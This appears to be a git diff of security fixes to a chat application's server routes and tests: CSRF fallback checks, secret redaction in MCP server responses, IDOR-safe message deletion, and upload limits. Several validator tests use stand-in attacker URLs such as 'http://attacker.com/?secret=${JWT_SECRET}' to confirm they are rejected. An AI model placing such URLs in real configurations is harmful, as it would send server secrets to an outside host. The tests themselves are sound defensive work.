jest.mock('@librechat/agents', () => ({ const MOCKS = '../__test-utils__/convos-route-mocks';
sleep: jest.fn(),
}));
jest.mock('@librechat/api', () => ({ jest.mock('@librechat/agents', () => require(MOCKS).agents());
isEnabled: jest.fn(), jest.mock('@librechat/api', () => require(MOCKS).api());
createAxiosInstance: jest.fn(() => ({ jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
get: jest.fn(), jest.mock('librechat-data-provider', () => require(MOCKS).dataProvider());
post: jest.fn(), jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
put: jest.fn(), jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
delete: jest.fn(), jest.mock('~/models', () => require(MOCKS).sharedModels());
})), jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
logAxiosError: jest.fn(), jest.mock('~/server/middleware', () => require(MOCKS).middlewarePassthrough());
})); jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
jest.mock('@librechat/data-schemas', () => ({ jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
logger: { jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
debug: jest.fn(), jest.mock('multer', () => require(MOCKS).multerLib());
info: jest.fn(), jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
warn: jest.fn(), jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
error: jest.fn(),
},
createModels: jest.fn(() => ({
User: {},
Conversation: {},
Message: {},
SharedLink: {},
})),
}));
jest.mock('~/models/Conversation', () => ({
getConvosByCursor: jest.fn(),
getConvo: jest.fn(),
deleteConvos: jest.fn(),
saveConvo: jest.fn(),
}));
jest.mock('~/models/ToolCall', () => ({
deleteToolCalls: jest.fn(),
}));
jest.mock('~/models', () => ({
deleteAllSharedLinks: jest.fn(),
deleteConvoSharedLink: jest.fn(),
}));
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
jest.mock('~/server/middleware', () => ({
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters: jest.fn(() => ({
forkIpLimiter: (req, res, next) => next(),
forkUserLimiter: (req, res, next) => next(),
})),
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
}));
jest.mock('~/server/utils/import/fork', () => ({
forkConversation: jest.fn(),
duplicateConversation: jest.fn(),
}));
jest.mock('~/server/utils/import', () => ({
importConversations: jest.fn(),
}));
jest.mock('~/cache/getLogStores', () => jest.fn());
jest.mock('~/server/routes/files/multer', () => ({
storage: {},
importFileFilter: jest.fn(),
}));
jest.mock('multer', () => {
return jest.fn(() => ({
single: jest.fn(() => (req, res, next) => {
req.file = { path: '/tmp/test-file.json' };
next();
}),
}));
});
jest.mock('librechat-data-provider', () => ({
CacheKeys: {
GEN_TITLE: 'GEN_TITLE',
},
EModelEndpoint: {
azureAssistants: 'azureAssistants',
assistants: 'assistants',
},
}));
jest.mock('~/server/services/Endpoints/azureAssistants', () => ({
initializeClient: jest.fn(),
}));
jest.mock('~/server/services/Endpoints/assistants', () => ({
initializeClient: jest.fn(),
}));
describe('Convos Routes', () => { describe('Convos Routes', () => {
let app; let app;

View file

@ -32,6 +32,9 @@ jest.mock('@librechat/api', () => {
getFlowState: jest.fn(), getFlowState: jest.fn(),
completeOAuthFlow: jest.fn(), completeOAuthFlow: jest.fn(),
generateFlowId: jest.fn(), generateFlowId: jest.fn(),
resolveStateToFlowId: jest.fn(async (state) => state),
storeStateMapping: jest.fn(),
deleteStateMapping: jest.fn(),
}, },
MCPTokenStorage: { MCPTokenStorage: {
storeTokens: jest.fn(), storeTokens: jest.fn(),
@ -180,7 +183,10 @@ describe('MCP Routes', () => {
MCPOAuthHandler.initiateOAuthFlow.mockResolvedValue({ MCPOAuthHandler.initiateOAuthFlow.mockResolvedValue({
authorizationUrl: 'https://oauth.example.com/auth', authorizationUrl: 'https://oauth.example.com/auth',
flowId: 'test-user-id:test-server', flowId: 'test-user-id:test-server',
flowMetadata: { state: 'random-state-value' },
}); });
MCPOAuthHandler.storeStateMapping.mockResolvedValue();
mockFlowManager.initFlow = jest.fn().mockResolvedValue();
const response = await request(app).get('/api/mcp/test-server/oauth/initiate').query({ const response = await request(app).get('/api/mcp/test-server/oauth/initiate').query({
userId: 'test-user-id', userId: 'test-user-id',
@ -367,6 +373,121 @@ describe('MCP Routes', () => {
expect(response.headers.location).toBe(`${basePath}/oauth/error?error=invalid_state`); expect(response.headers.location).toBe(`${basePath}/oauth/error?error=invalid_state`);
}); });
describe('CSRF fallback via active PENDING flow', () => {
it('should proceed when a fresh PENDING flow exists and no cookies are present', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'PENDING',
createdAt: Date.now(),
}),
completeFlow: jest.fn().mockResolvedValue(true),
deleteFlow: jest.fn().mockResolvedValue(true),
};
const mockFlowState = {
serverName: 'test-server',
userId: 'test-user-id',
metadata: {},
clientInfo: {},
codeVerifier: 'test-verifier',
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
MCPOAuthHandler.getFlowState.mockResolvedValue(mockFlowState);
MCPOAuthHandler.completeOAuthFlow.mockResolvedValue({
access_token: 'test-token',
});
MCPTokenStorage.storeTokens.mockResolvedValue();
mockRegistryInstance.getServerConfig.mockResolvedValue({});
const mockMcpManager = {
getUserConnection: jest.fn().mockResolvedValue({
fetchTools: jest.fn().mockResolvedValue([]),
}),
};
require('~/config').getMCPManager.mockReturnValue(mockMcpManager);
require('~/config').getOAuthReconnectionManager.mockReturnValue({
clearReconnection: jest.fn(),
});
require('~/server/services/Config/mcp').updateMCPServerTools.mockResolvedValue();
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toContain(`${basePath}/oauth/success`);
});
it('should reject when no PENDING flow exists and no cookies are present', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue(null),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
it('should reject when only a COMPLETED flow exists (not PENDING)', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'COMPLETED',
createdAt: Date.now(),
}),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
it('should reject when PENDING flow is stale (older than PENDING_STALE_MS)', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'PENDING',
createdAt: Date.now() - 3 * 60 * 1000,
}),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
});
it('should handle OAuth callback successfully', async () => { it('should handle OAuth callback successfully', async () => {
// mockRegistryInstance is defined at the top of the file // mockRegistryInstance is defined at the top of the file
const mockFlowManager = { const mockFlowManager = {
@ -1572,12 +1693,14 @@ describe('MCP Routes', () => {
it('should return all server configs for authenticated user', async () => { it('should return all server configs for authenticated user', async () => {
const mockServerConfigs = { const mockServerConfigs = {
'server-1': { 'server-1': {
endpoint: 'http://server1.com', type: 'sse',
name: 'Server 1', url: 'http://server1.com/sse',
title: 'Server 1',
}, },
'server-2': { 'server-2': {
endpoint: 'http://server2.com', type: 'sse',
name: 'Server 2', url: 'http://server2.com/sse',
title: 'Server 2',
}, },
}; };
@ -1586,7 +1709,18 @@ describe('MCP Routes', () => {
const response = await request(app).get('/api/mcp/servers'); const response = await request(app).get('/api/mcp/servers');
expect(response.status).toBe(200); expect(response.status).toBe(200);
expect(response.body).toEqual(mockServerConfigs); expect(response.body['server-1']).toMatchObject({
type: 'sse',
url: 'http://server1.com/sse',
title: 'Server 1',
});
expect(response.body['server-2']).toMatchObject({
type: 'sse',
url: 'http://server2.com/sse',
title: 'Server 2',
});
expect(response.body['server-1'].headers).toBeUndefined();
expect(response.body['server-2'].headers).toBeUndefined();
expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id'); expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id');
}); });
@ -1641,10 +1775,10 @@ describe('MCP Routes', () => {
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig }); const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
expect(response.status).toBe(201); expect(response.status).toBe(201);
expect(response.body).toEqual({ expect(response.body.serverName).toBe('test-sse-server');
serverName: 'test-sse-server', expect(response.body.type).toBe('sse');
...validConfig, expect(response.body.url).toBe('https://mcp-server.example.com/sse');
}); expect(response.body.title).toBe('Test SSE Server');
expect(mockRegistryInstance.addServer).toHaveBeenCalledWith( expect(mockRegistryInstance.addServer).toHaveBeenCalledWith(
'temp_server_name', 'temp_server_name',
expect.objectContaining({ expect.objectContaining({
@ -1698,6 +1832,78 @@ describe('MCP Routes', () => {
expect(response.body.message).toBe('Invalid configuration'); expect(response.body.message).toBe('Invalid configuration');
}); });
it('should reject SSE URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'sse',
url: 'http://attacker.com/?secret=${JWT_SECRET}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should reject streamable-http URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'streamable-http',
url: 'http://attacker.com/?key=${CREDS_KEY}&iv=${CREDS_IV}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should reject websocket URL containing env variable references', async () => {
const response = await request(app)
.post('/api/mcp/servers')
.send({
config: {
type: 'websocket',
url: 'ws://attacker.com/?secret=${MONGO_URI}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.addServer).not.toHaveBeenCalled();
});
it('should redact secrets from create response', async () => {
const validConfig = {
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Test Server',
};
mockRegistryInstance.addServer.mockResolvedValue({
serverName: 'test-server',
config: {
...validConfig,
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'admin-secret-key' },
oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' },
headers: { Authorization: 'Bearer leaked-token' },
},
});
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
expect(response.status).toBe(201);
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.headers).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_id).toBe('cid');
});
it('should return 500 when registry throws error', async () => { it('should return 500 when registry throws error', async () => {
const validConfig = { const validConfig = {
type: 'sse', type: 'sse',
@ -1727,7 +1933,9 @@ describe('MCP Routes', () => {
const response = await request(app).get('/api/mcp/servers/test-server'); const response = await request(app).get('/api/mcp/servers/test-server');
expect(response.status).toBe(200); expect(response.status).toBe(200);
expect(response.body).toEqual(mockConfig); expect(response.body.type).toBe('sse');
expect(response.body.url).toBe('https://mcp-server.example.com/sse');
expect(response.body.title).toBe('Test Server');
expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith( expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith(
'test-server', 'test-server',
'test-user-id', 'test-user-id',
@ -1743,6 +1951,29 @@ describe('MCP Routes', () => {
expect(response.body).toEqual({ message: 'MCP server not found' }); expect(response.body).toEqual({ message: 'MCP server not found' });
}); });
it('should redact secrets from get response', async () => {
mockRegistryInstance.getServerConfig.mockResolvedValue({
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Secret Server',
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'decrypted-admin-key' },
oauth: { client_id: 'cid', client_secret: 'decrypted-oauth-secret' },
headers: { Authorization: 'Bearer internal-token' },
oauth_headers: { 'X-OAuth': 'secret-value' },
});
const response = await request(app).get('/api/mcp/servers/secret-server');
expect(response.status).toBe(200);
expect(response.body.title).toBe('Secret Server');
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.oauth?.client_id).toBe('cid');
expect(response.body.headers).toBeUndefined();
expect(response.body.oauth_headers).toBeUndefined();
});
it('should return 500 when registry throws error', async () => { it('should return 500 when registry throws error', async () => {
mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error')); mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error'));
@ -1769,7 +2000,9 @@ describe('MCP Routes', () => {
.send({ config: updatedConfig }); .send({ config: updatedConfig });
expect(response.status).toBe(200); expect(response.status).toBe(200);
expect(response.body).toEqual(updatedConfig); expect(response.body.type).toBe('sse');
expect(response.body.url).toBe('https://updated-mcp-server.example.com/sse');
expect(response.body.title).toBe('Updated Server');
expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith( expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith(
'test-server', 'test-server',
expect.objectContaining({ expect.objectContaining({
@ -1781,6 +2014,35 @@ describe('MCP Routes', () => {
); );
}); });
it('should redact secrets from update response', async () => {
const validConfig = {
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Updated Server',
};
mockRegistryInstance.updateServer.mockResolvedValue({
...validConfig,
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'preserved-admin-key' },
oauth: { client_id: 'cid', client_secret: 'preserved-oauth-secret' },
headers: { Authorization: 'Bearer internal-token' },
env: { DATABASE_URL: 'postgres://admin:pass@localhost/db' },
});
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({ config: validConfig });
expect(response.status).toBe(200);
expect(response.body.title).toBe('Updated Server');
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.oauth?.client_id).toBe('cid');
expect(response.body.headers).toBeUndefined();
expect(response.body.env).toBeUndefined();
});
it('should return 400 for invalid configuration', async () => { it('should return 400 for invalid configuration', async () => {
const invalidConfig = { const invalidConfig = {
type: 'sse', type: 'sse',
@ -1797,6 +2059,51 @@ describe('MCP Routes', () => {
expect(response.body.errors).toBeDefined(); expect(response.body.errors).toBeDefined();
}); });
it('should reject SSE URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'sse',
url: 'http://attacker.com/?secret=${JWT_SECRET}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should reject streamable-http URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'streamable-http',
url: 'http://attacker.com/?key=${CREDS_KEY}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should reject websocket URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'websocket',
url: 'ws://attacker.com/?secret=${MONGO_URI}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should return 500 when registry throws error', async () => { it('should return 500 when registry throws error', async () => {
const validConfig = { const validConfig = {
type: 'sse', type: 'sse',

View file

@ -0,0 +1,200 @@
const mongoose = require('mongoose');
const express = require('express');
const request = require('supertest');
const { v4: uuidv4 } = require('uuid');
const { MongoMemoryServer } = require('mongodb-memory-server');
jest.mock('@librechat/agents', () => ({
sleep: jest.fn(),
}));
jest.mock('@librechat/api', () => ({
unescapeLaTeX: jest.fn((x) => x),
countTokens: jest.fn().mockResolvedValue(10),
}));
jest.mock('@librechat/data-schemas', () => ({
...jest.requireActual('@librechat/data-schemas'),
logger: {
debug: jest.fn(),
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
},
}));
jest.mock('librechat-data-provider', () => ({
...jest.requireActual('librechat-data-provider'),
}));
jest.mock('~/models', () => ({
saveConvo: jest.fn(),
getMessage: jest.fn(),
saveMessage: jest.fn(),
getMessages: jest.fn(),
updateMessage: jest.fn(),
deleteMessages: jest.fn(),
}));
jest.mock('~/server/services/Artifacts/update', () => ({
findAllArtifacts: jest.fn(),
replaceArtifactContent: jest.fn(),
}));
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
jest.mock('~/server/middleware', () => ({
requireJwtAuth: (req, res, next) => next(),
validateMessageReq: (req, res, next) => next(),
}));
jest.mock('~/models/Conversation', () => ({
getConvosQueried: jest.fn(),
}));
jest.mock('~/db/models', () => ({
Message: {
findOne: jest.fn(),
find: jest.fn(),
meiliSearch: jest.fn(),
},
}));
/* ─── Model-level tests: real MongoDB, proves cross-user deletion is prevented ─── */
const { messageSchema } = require('@librechat/data-schemas');
describe('deleteMessages model-level IDOR prevention', () => {
let mongoServer;
let Message;
const ownerUserId = 'user-owner-111';
const attackerUserId = 'user-attacker-222';
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
Message = mongoose.models.Message || mongoose.model('Message', messageSchema);
await mongoose.connect(mongoServer.getUri());
});
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Message.deleteMany({});
});
it("should NOT delete another user's message when attacker supplies victim messageId", async () => {
const conversationId = uuidv4();
const victimMsgId = 'victim-msg-001';
await Message.create({
messageId: victimMsgId,
conversationId,
user: ownerUserId,
text: 'Sensitive owner data',
});
await Message.deleteMany({ messageId: victimMsgId, user: attackerUserId });
const victimMsg = await Message.findOne({ messageId: victimMsgId }).lean();
expect(victimMsg).not.toBeNull();
expect(victimMsg.user).toBe(ownerUserId);
expect(victimMsg.text).toBe('Sensitive owner data');
});
it("should delete the user's own message", async () => {
const conversationId = uuidv4();
const ownMsgId = 'own-msg-001';
await Message.create({
messageId: ownMsgId,
conversationId,
user: ownerUserId,
text: 'My message',
});
const result = await Message.deleteMany({ messageId: ownMsgId, user: ownerUserId });
expect(result.deletedCount).toBe(1);
const deleted = await Message.findOne({ messageId: ownMsgId }).lean();
expect(deleted).toBeNull();
});
it('should scope deletion by conversationId, messageId, and user together', async () => {
const convoA = uuidv4();
const convoB = uuidv4();
await Message.create([
{ messageId: 'msg-a1', conversationId: convoA, user: ownerUserId, text: 'A1' },
{ messageId: 'msg-b1', conversationId: convoB, user: ownerUserId, text: 'B1' },
]);
await Message.deleteMany({ messageId: 'msg-a1', conversationId: convoA, user: attackerUserId });
const remaining = await Message.find({ user: ownerUserId }).lean();
expect(remaining).toHaveLength(2);
});
});
/* ─── Route-level tests: supertest + mocked deleteMessages ─── */
describe('DELETE /:conversationId/:messageId route handler', () => {
let app;
const { deleteMessages } = require('~/models');
const authenticatedUserId = 'user-owner-123';
beforeAll(() => {
const messagesRouter = require('../messages');
app = express();
app.use(express.json());
app.use((req, res, next) => {
req.user = { id: authenticatedUserId };
next();
});
app.use('/api/messages', messagesRouter);
});
beforeEach(() => {
jest.clearAllMocks();
});
it('should pass user and conversationId in the deleteMessages filter', async () => {
deleteMessages.mockResolvedValue({ deletedCount: 1 });
await request(app).delete('/api/messages/convo-1/msg-1');
expect(deleteMessages).toHaveBeenCalledTimes(1);
expect(deleteMessages).toHaveBeenCalledWith({
messageId: 'msg-1',
conversationId: 'convo-1',
user: authenticatedUserId,
});
});
it('should return 204 on successful deletion', async () => {
deleteMessages.mockResolvedValue({ deletedCount: 1 });
const response = await request(app).delete('/api/messages/convo-1/msg-owned');
expect(response.status).toBe(204);
expect(deleteMessages).toHaveBeenCalledWith({
messageId: 'msg-owned',
conversationId: 'convo-1',
user: authenticatedUserId,
});
});
it('should return 500 when deleteMessages throws', async () => {
deleteMessages.mockRejectedValue(new Error('DB failure'));
const response = await request(app).delete('/api/messages/convo-1/msg-1');
expect(response.status).toBe(500);
expect(response.body).toEqual({ error: 'Internal server error' });
});
});

View file

@ -143,6 +143,9 @@ router.post(
if (actions_result && actions_result.length) { if (actions_result && actions_result.length) {
const action = actions_result[0]; const action = actions_result[0];
if (action.agent_id !== agent_id) {
return res.status(403).json({ message: 'Action does not belong to this agent' });
}
metadata = { ...action.metadata, ...metadata }; metadata = { ...action.metadata, ...metadata };
} }
@ -184,7 +187,7 @@ router.post(
} }
/** @type {[Action]} */ /** @type {[Action]} */
const updatedAction = await updateAction({ action_id }, actionUpdateData); const updatedAction = await updateAction({ action_id, agent_id }, actionUpdateData);
const sensitiveFields = ['api_key', 'oauth_client_id', 'oauth_client_secret']; const sensitiveFields = ['api_key', 'oauth_client_id', 'oauth_client_secret'];
for (let field of sensitiveFields) { for (let field of sensitiveFields) {
@ -251,7 +254,13 @@ router.delete(
{ tools: updatedTools, actions: updatedActions }, { tools: updatedTools, actions: updatedActions },
{ updatingUserId: req.user.id, forceVersion: true }, { updatingUserId: req.user.id, forceVersion: true },
); );
await deleteAction({ action_id }); const deleted = await deleteAction({ action_id, agent_id });
if (!deleted) {
logger.warn('[Agent Action Delete] No matching action document found', {
action_id,
agent_id,
});
}
res.status(200).json({ message: 'Action deleted successfully' }); res.status(200).json({ message: 'Action deleted successfully' });
} catch (error) { } catch (error) {
const message = 'Trouble deleting the Agent Action'; const message = 'Trouble deleting the Agent Action';

View file

@ -76,52 +76,62 @@ router.get('/chat/stream/:streamId', async (req, res) => {
logger.debug(`[AgentStream] Client subscribed to ${streamId}, resume: ${isResume}`); logger.debug(`[AgentStream] Client subscribed to ${streamId}, resume: ${isResume}`);
// Send sync event with resume state for ALL reconnecting clients const writeEvent = (event) => {
// This supports multi-tab scenarios where each tab needs run step data if (!res.writableEnded) {
if (isResume) { res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`);
const resumeState = await GenerationJobManager.getResumeState(streamId);
if (resumeState && !res.writableEnded) {
// Send sync event with run steps AND aggregatedContent
// Client will use aggregatedContent to initialize message state
res.write(`event: message\ndata: ${JSON.stringify({ sync: true, resumeState })}\n\n`);
if (typeof res.flush === 'function') { if (typeof res.flush === 'function') {
res.flush(); res.flush();
} }
logger.debug(
`[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps`,
);
} }
} };
const result = await GenerationJobManager.subscribe( const onDone = (event) => {
streamId, writeEvent(event);
(event) => { res.end();
if (!res.writableEnded) { };
res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`);
const onError = (error) => {
if (!res.writableEnded) {
res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`);
if (typeof res.flush === 'function') {
res.flush();
}
res.end();
}
};
let result;
if (isResume) {
const { subscription, resumeState, pendingEvents } =
await GenerationJobManager.subscribeWithResume(streamId, writeEvent, onDone, onError);
if (!res.writableEnded) {
if (resumeState) {
res.write(
`event: message\ndata: ${JSON.stringify({ sync: true, resumeState, pendingEvents })}\n\n`,
);
if (typeof res.flush === 'function') { if (typeof res.flush === 'function') {
res.flush(); res.flush();
} }
} GenerationJobManager.markSyncSent(streamId);
}, logger.debug(
(event) => { `[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps, ${pendingEvents.length} pending events`,
if (!res.writableEnded) { );
res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); } else if (pendingEvents.length > 0) {
if (typeof res.flush === 'function') { for (const event of pendingEvents) {
res.flush(); writeEvent(event);
} }
res.end(); logger.warn(
`[AgentStream] Resume state null for ${streamId}, replayed ${pendingEvents.length} gap events directly`,
);
} }
}, }
(error) => {
if (!res.writableEnded) { result = subscription;
res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`); } else {
if (typeof res.flush === 'function') { result = await GenerationJobManager.subscribe(streamId, writeEvent, onDone, onError);
res.flush(); }
}
res.end();
}
},
);
if (!result) { if (!result) {
return res.status(404).json({ error: 'Failed to subscribe to stream' }); return res.status(404).json({ error: 'Failed to subscribe to stream' });

View file

@ -60,6 +60,9 @@ router.post('/:assistant_id', async (req, res) => {
if (actions_result && actions_result.length) { if (actions_result && actions_result.length) {
const action = actions_result[0]; const action = actions_result[0];
if (action.assistant_id !== assistant_id) {
return res.status(403).json({ message: 'Action does not belong to this assistant' });
}
metadata = { ...action.metadata, ...metadata }; metadata = { ...action.metadata, ...metadata };
} }
@ -117,7 +120,7 @@ router.post('/:assistant_id', async (req, res) => {
// For new actions, use the assistant owner's user ID // For new actions, use the assistant owner's user ID
actionUpdateData.user = assistant_user || req.user.id; actionUpdateData.user = assistant_user || req.user.id;
} }
promises.push(updateAction({ action_id }, actionUpdateData)); promises.push(updateAction({ action_id, assistant_id }, actionUpdateData));
/** @type {[AssistantDocument, Action]} */ /** @type {[AssistantDocument, Action]} */
let [assistantDocument, updatedAction] = await Promise.all(promises); let [assistantDocument, updatedAction] = await Promise.all(promises);
@ -196,9 +199,15 @@ router.delete('/:assistant_id/:action_id/:model', async (req, res) => {
assistantUpdateData.user = req.user.id; assistantUpdateData.user = req.user.id;
} }
promises.push(updateAssistantDoc({ assistant_id }, assistantUpdateData)); promises.push(updateAssistantDoc({ assistant_id }, assistantUpdateData));
promises.push(deleteAction({ action_id })); promises.push(deleteAction({ action_id, assistant_id }));
await Promise.all(promises); const [, deletedAction] = await Promise.all(promises);
if (!deletedAction) {
logger.warn('[Assistant Action Delete] No matching action document found', {
action_id,
assistant_id,
});
}
res.status(200).json({ message: 'Action deleted successfully' }); res.status(200).json({ message: 'Action deleted successfully' });
} catch (error) { } catch (error) {
const message = 'Trouble deleting the Assistant Action'; const message = 'Trouble deleting the Assistant Action';

View file

@ -63,7 +63,7 @@ router.post(
resetPasswordController, resetPasswordController,
); );
router.get('/2fa/enable', middleware.requireJwtAuth, enable2FA); router.post('/2fa/enable', middleware.requireJwtAuth, enable2FA);
router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA); router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA);
router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken); router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken);
router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA); router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA);

View file

@ -1,7 +1,7 @@
const multer = require('multer'); const multer = require('multer');
const express = require('express'); const express = require('express');
const { sleep } = require('@librechat/agents'); const { sleep } = require('@librechat/agents');
const { isEnabled } = require('@librechat/api'); const { isEnabled, resolveImportMaxFileSize } = require('@librechat/api');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { CacheKeys, EModelEndpoint } = require('librechat-data-provider'); const { CacheKeys, EModelEndpoint } = require('librechat-data-provider');
const { const {
@ -224,8 +224,27 @@ router.post('/update', validateConvoAccess, async (req, res) => {
}); });
const { importIpLimiter, importUserLimiter } = createImportLimiters(); const { importIpLimiter, importUserLimiter } = createImportLimiters();
/** Fork and duplicate share one rate-limit budget (same "clone" operation class) */
const { forkIpLimiter, forkUserLimiter } = createForkLimiters(); const { forkIpLimiter, forkUserLimiter } = createForkLimiters();
const upload = multer({ storage: storage, fileFilter: importFileFilter }); const importMaxFileSize = resolveImportMaxFileSize();
const upload = multer({
storage,
fileFilter: importFileFilter,
limits: { fileSize: importMaxFileSize },
});
const uploadSingle = upload.single('file');
function handleUpload(req, res, next) {
uploadSingle(req, res, (err) => {
if (err && err.code === 'LIMIT_FILE_SIZE') {
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
}
if (err) {
return next(err);
}
next();
});
}
/** /**
* Imports a conversation from a JSON file and saves it to the database. * Imports a conversation from a JSON file and saves it to the database.
@ -238,7 +257,7 @@ router.post(
importIpLimiter, importIpLimiter,
importUserLimiter, importUserLimiter,
configMiddleware, configMiddleware,
upload.single('file'), handleUpload,
async (req, res) => { async (req, res) => {
try { try {
/* TODO: optimize to return imported conversations and add manually */ /* TODO: optimize to return imported conversations and add manually */
@ -280,7 +299,7 @@ router.post('/fork', forkIpLimiter, forkUserLimiter, async (req, res) => {
} }
}); });
router.post('/duplicate', async (req, res) => { router.post('/duplicate', forkIpLimiter, forkUserLimiter, async (req, res) => {
const { conversationId, title } = req.body; const { conversationId, title } = req.body;
try { try {

View file

@ -2,12 +2,12 @@ const fs = require('fs').promises;
const express = require('express'); const express = require('express');
const { EnvVar } = require('@librechat/agents'); const { EnvVar } = require('@librechat/agents');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { verifyAgentUploadPermission } = require('@librechat/api');
const { const {
Time, Time,
isUUID, isUUID,
CacheKeys, CacheKeys,
FileSources, FileSources,
